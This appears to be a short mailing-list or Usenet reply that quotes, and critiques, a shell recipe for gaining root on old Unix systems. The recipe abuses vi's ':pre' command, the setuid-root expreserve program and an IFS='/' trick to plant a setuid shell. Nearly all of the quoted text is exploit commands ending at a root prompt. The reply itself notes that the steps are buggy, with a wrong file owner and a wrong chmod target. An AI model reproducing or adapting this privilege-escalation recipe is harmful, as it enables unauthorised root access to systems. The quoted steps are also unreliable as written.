Charles Howes said... > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some > versions). Expreserve is setuid root. Expreserve runs /bin/mail > with 'system()'. So, do the following: > % cd /tmp > % cp /bin/sh fubar > % cat > bin > chmod 4755 fubar > ^D > % chmod u+x fubar I see a couple problems with the script so far. /bin/sh was copied to fubar while you are a regular user, so it will be owned by you and you'll end up with a nice copy of /bin/sh that's setuid to you, not your target user. Also, that last line should probably read 'chmod u+x bin', not fubar. > % setenv IFS=/ > % vi > :pre > :q > % fubar > # > Some versions of expreserve don't have the hole. > Some versions of vi don't have the :pre command. > One does not imply the other. Thanks for posting it anyway. - Chris